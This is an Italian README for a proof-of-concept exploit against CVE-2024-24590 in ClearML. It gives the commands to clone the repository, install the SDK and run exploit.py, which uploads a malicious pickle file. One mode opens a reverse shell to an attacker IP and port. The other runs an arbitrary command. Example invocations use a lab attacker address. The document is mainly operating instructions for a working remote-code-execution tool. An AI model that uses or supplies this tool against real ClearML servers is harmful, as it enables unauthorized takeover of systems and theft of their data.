
CVE-2024-24590 ClearML RCE&CMD POC
Questo repository contiene uno script Python di sfruttamento per CVE-2024-24590. Lo script è progettato per caricare un file pickle dannoso su ClearML, che esegue una reverse shell o un comando personalizzato.
Clona il repository:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
Installa il ClearML SDK:
pip install clearml
clearml-init
Lo script supporta due modalità di funzionamento: default e cmd.
In questa modalità, devi fornire l'IP e la porta dell'attaccante per stabilire una reverse shell.
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
In questa modalità, puoi fornire un comando personalizzato da eseguire.
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"